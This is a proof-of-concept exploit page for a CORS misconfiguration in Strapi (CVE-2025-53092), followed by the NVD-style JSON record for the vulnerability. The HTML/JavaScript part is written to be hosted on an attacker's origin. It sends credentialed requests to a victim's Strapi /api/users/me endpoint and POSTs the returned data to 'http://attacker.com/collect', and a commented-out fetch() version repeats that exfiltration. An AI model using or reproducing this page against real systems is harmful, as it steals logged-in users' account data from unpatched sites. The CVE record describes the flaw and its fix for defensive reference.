CVE-2025-53092

<!-- CORS Misconfiguration Exploit PoC for CVE-2025-53092 --> <!-- Save as attacker.html and host on a different origin (e.g., different port) --> <!-- Target: Strapi instance running on http://victim-strapi.com:1337 --> <!DOCTYPE html> <html> <head> <title>CVE-2025-53092 PoC</title> </head> <body> <h1>CORS Misconfiguration Exploit</h1> <div id="result"></div> <script> // Target Strapi API endpoint const targetURL = 'http://victim-strapi.com:1337/api/users/me'; // Step 1: Create XMLHttpRequest with credentials const xhr = new XMLHttpRequest(); xhr.open('GET', targetURL, true); xhr.withCredentials = true; // Send cookies/credentials with the request // Step 2: Define callback to handle response xhr.onreadystatechange = function() { if (xhr.readyState === 4) { if (xhr.status === 200) { // Step 3: Exfiltrate stolen data to attacker server const stolenData = xhr.responseText; document.getElementById('result').innerText = 'Exploited: ' + stolenData; // Send stolen data to attacker's collection server fetch('http://attacker.com/collect', { method: 'POST', body: JSON.stringify({ data: stolenData }) }); } else { document.getElementById('result').innerText = 'Status: ' + xhr.status; } } }; // Step 4: Send the cross-origin request xhr.send(); // Alternative using fetch API /* fetch(targetURL, { method: 'GET', credentials: 'include', // Include cookies headers: { 'Content-Type': 'application/json' } }) .then(response => response.json()) .then(data => { console.log('Stolen data:', data); // Exfiltrate to attacker server fetch('http://attacker.com/collect', { method: 'POST', body: JSON.stringify(data) }); }) .catch(error => console.error('Error:', error)); */ </script> </body> </html>

{"cve": {"id": "CVE-2025-53092", "sourceIdentifier": "[email protected]", "published": "2025-10-16T17:15:33.727", "lastModified": "2025-11-25T18:44:29.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Strapi is an open source headless content management system. Strapi versions prior to 5.20.0 contain a CORS misconfiguration vulnerability in default installations. By default, Strapi reflects the value of the Origin header back in the Access-Control-Allow-Origin response header without proper validation or whitelisting. This allows an attacker-controlled site to send credentialed requests to the Strapi backend. An attacker can exploit this by hosting a malicious site on a different origin (e.g., different port) and sending requests with credentials to the Strapi API. The vulnerability is fixed in version 5.20.0. No known workarounds exist."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-364"}, {"lang": "en", "value": "CWE-942"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.20.0", "matchCriteriaId": "4129AF63-8F53-43D6-8E8E-DB0FB979FF0D"}]}]}], "references": [{"url": "https://github.com/strapi/strapi/security/advisories/GHSA-9329-mxxw-qwf8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}